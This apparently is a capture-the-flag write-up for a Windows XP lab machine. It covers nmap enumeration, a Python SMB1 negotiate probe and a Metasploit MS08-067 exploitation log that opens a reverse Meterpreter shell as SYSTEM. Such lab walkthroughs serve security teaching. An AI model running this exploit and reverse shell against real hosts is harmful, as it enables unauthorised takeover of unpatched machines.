##Enumeration##
Start off with our handy-dandy Nmap scan:
###Nmap###
nmap -T4 -A -v 10.10.10.4
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 16:15 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating Ping Scan at 16:15
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 16:15, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.02s elapsed
Initiating SYN Stealth Scan at 16:15
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 16:15, 9.39s elapsed (1000 total ports)
Initiating Service scan at 16:15
Scanning 2 services on 10.10.10.4
Completed Service scan at 16:15, 6.46s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 16:15
Completed Traceroute at 16:15, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:15
Completed Parallel DNS resolution of 2 hosts. at 16:15, 0.02s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 16:15
Completed NSE at 16:20, 251.11s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%), General Dynamics embedded (85%), Cisco embedded (85%), Motorola embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003 cpe:/h:cisco:isb7150 cpe:/o:microsoft:windows_ce:5.0 cpe:/h:motorola:vip1200
Aggressive OS guesses: Microsoft Windows 2000 Server (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP2 (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%), Microsoft Windows XP SP2 or SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -3h00m02s, deviation: 0s, median: -3h00m02s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:30:6d (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2017-09-17T20:15:47+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 123.57 ms 10.10.14.1
2 122.34 ms 10.10.10.4
NSE: Script Post-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 275.83 seconds
Raw packets sent: 2101 (97.178KB) | Rcvd: 64 (3.774KB)
There isn't too much going on here: only SMB is exposed, NetBIOS session on 139/tcp and Microsoft-DS on 445/tcp, with 3389 closed and everything else filtered. The host scripts do the real work. smb-os-discovery says Windows XP, smb2-time fails because the box only speaks SMB1, and smb-security-mode shows message signing disabled with a guest session accepted. An unpatched XP host with SMB1 open should be a walk in the park.
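The message_signing and authentication_level lines above come from a single SMB1 round trip: the client sends a NEGOTIATE request listing the dialects it speaks, and the server answers with the dialect it picked plus a SecurityMode byte whose two signing bits decide the verdict. The script below reproduces that exchange and its decoding. It is an added example written for this page, not the author's or nmap's code; the function and constant names (build_negotiate_request, parse_negotiate_response, signing_verdict, negotiate) are mine, and sample_response_legacy() is a reply constructed by hand to match the nmap findings for LEGACY, not a capture from the box.

```python
"""SMB1 NEGOTIATE probe: the exchange behind nmap's smb-security-mode output.
Added example for this writeup, not the author's code. sample_response_legacy()
is a hand-constructed reply, not a capture from the box."""
import socket
import struct

SMB_COM_NEGOTIATE = 0x72
DIALECTS = [b"NT LM 0.12"]        # the only dialect offered, so a reply picks index 0
SM_USER_LEVEL = 0x01              # SecurityMode bits, MS-CIFS 2.2.4.52.2
SM_CHALLENGE_RESP = 0x02
SM_SIGNING_ENABLED = 0x04
SM_SIGNING_REQUIRED = 0x08
CAP_EXTENDED_SECURITY = 0x80000000


def smb_header(command, reply=False):
    """32-byte SMB1 header; Flags2 0xC801 = Unicode, NT status, extended security, long names."""
    flags = 0x18 | (0x80 if reply else 0)                # 0x80 = SMB_FLAGS_REPLY
    return (b"\xffSMB" + struct.pack("<BIBH", command, 0, flags, 0xC801)
            + struct.pack("<H", 0) + b"\x00" * 8 + struct.pack("<H", 0)  # PIDHigh, signature, reserved
            + struct.pack("<HHHH", 0, 0xFEFF, 0, 0))       # TID, PID, UID, MID


def build_negotiate_request():
    """NetBIOS session header + SMB header + NEGOTIATE body (WordCount 0, dialect list)."""
    dialect_blob = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    smb = smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialect_blob)) + dialect_blob
    return struct.pack(">I", len(smb)) + smb               # type 0x00 + 24-bit length


def parse_negotiate_response(packet):
    """Decode a NetBIOS-framed SMB1 NEGOTIATE reply into the findings nmap reports."""
    if len(packet) < 4 + 32 + 1:
        raise ValueError("short packet")
    smb = packet[4:4 + (struct.unpack(">I", packet[:4])[0] & 0xFFFFFF)]
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_NEGOTIATE or not smb[9] & 0x80:
        raise ValueError("not an SMB1 NEGOTIATE reply")
    status = struct.unpack("<I", smb[5:9])[0]
    if status:
        raise ValueError("server returned NT status 0x%08x" % status)
    word_count = smb[32]
    if word_count != 17:                                   # 1 = core dialect only, 0 = error
        raise ValueError("WordCount %d: server did not negotiate NT LM 0.12" % word_count)
    (dialect_index, security_mode, _mpx, _vcs, _buf, _raw, _key, caps, _time, _tz,
     challenge_len) = struct.unpack("<HBHHIIIIqhB", smb[33:33 + 2 * word_count])
    if dialect_index >= len(DIALECTS):                     # 0xFFFF = nothing accepted
        raise ValueError("server accepted none of the offered dialects")
    off = 33 + 2 * word_count
    data = smb[off + 2:off + 2 + struct.unpack("<H", smb[off:off + 2])[0]]
    info = {
        "dialect": DIALECTS[dialect_index].decode(),
        "user_level_auth": bool(security_mode & SM_USER_LEVEL),
        "challenge_response": bool(security_mode & SM_CHALLENGE_RESP),
        "signing_enabled": bool(security_mode & SM_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SM_SIGNING_REQUIRED),
        "extended_security": bool(caps & CAP_EXTENDED_SECURITY),
    }
    if info["extended_security"]:                          # GUID, then optional SPNEGO blob
        info["server_guid"] = data[:16].hex()
    else:                                                  # legacy form: challenge + Unicode domain
        info["challenge"] = data[:challenge_len].hex()
        info["domain"] = data[challenge_len:].decode("utf-16-le", "ignore").rstrip("\x00")
    return info


def signing_verdict(info):
    """nmap's wording for message_signing, derived from the two signing bits."""
    if info["signing_required"]:
        return "required"
    return "supported" if info["signing_enabled"] else "disabled (dangerous, but default)"


def sample_response_legacy():
    """Constructed reply mirroring LEGACY: NT LM 0.12, user-level auth, challenge/response,
    no signing, extended security, timezone -180 minutes (UTC+3 as in the nmap output)."""
    params = struct.pack("<HBHHIIIIqhB", 0, SM_USER_LEVEL | SM_CHALLENGE_RESP,
                         50, 1, 16644, 65536, 0, 0xE3FD | CAP_EXTENDED_SECURITY, 0, -180, 0)
    data = bytes(range(16))                                # made-up server GUID, no SPNEGO blob
    smb = (smb_header(SMB_COM_NEGOTIATE, reply=True) + struct.pack("<B", 17) + params
           + struct.pack("<H", len(data)) + data)
    return struct.pack(">I", len(smb)) + smb


def negotiate(host, port=445, timeout=5.0):
    """Run the exchange against a live host, e.g. negotiate("10.10.10.4"); not used offline."""
    def recv_exact(sock, n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer closed the connection mid-packet")
            buf += chunk
        return buf
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        hdr = recv_exact(s, 4)
        return parse_negotiate_response(hdr + recv_exact(s, struct.unpack(">I", hdr)[0] & 0xFFFFFF))
```

Against a live SMB1 host, negotiate(host) returns the same dict that parse_negotiate_response() produces for the constructed sample. A host that has SMB1 disabled or refuses NT LM 0.12 raises ConnectionError or ValueError instead of quietly reporting signing as disabled, which is the failure mode to watch for when scripting this across a range.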
##Exploitation##
A quick search for Windows XP SMB gets us MS08-067 (CVE-2008-4250), a stack overflow in the Server service's path canonicalisation that is reachable without credentials over the SRVSVC or BROWSER named pipe, which is exactly what the module's SMBPIPE option selects. Metasploit has a module for it. How convenient! Let's try it.
exploit/windows/smb/ms08_067_netapi
The default target 0 (Automatic Targeting) fingerprints the host over SMB and picks the return address for its OS, service pack and language; that is the "Automatically detecting the target" line in the output below. You only need to set a target by hand if that fingerprint fails, and the ids differ between Metasploit versions (for me, 7 was Windows XP SP3 English), so do show targets
to list all available before picking one.
msf exploit(usermap_script) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(ms08_067_netapi) > set target 7
target => 7
msf exploit(ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (171583 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035) at 2017-09-17 16:24:57 -0400
[+] negotiating tlv encryption
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We're in, and getuid shows NT AUTHORITY\SYSTEM straight away: the Server service that the overflow lands in runs as SYSTEM, so there is no privilege escalation step on this box. Grab the flags from C:\Documents and Settings\john\Desktop\user.txt
and C:\Documents and Settings\Administrator\Desktop\root.txt
and call it a day.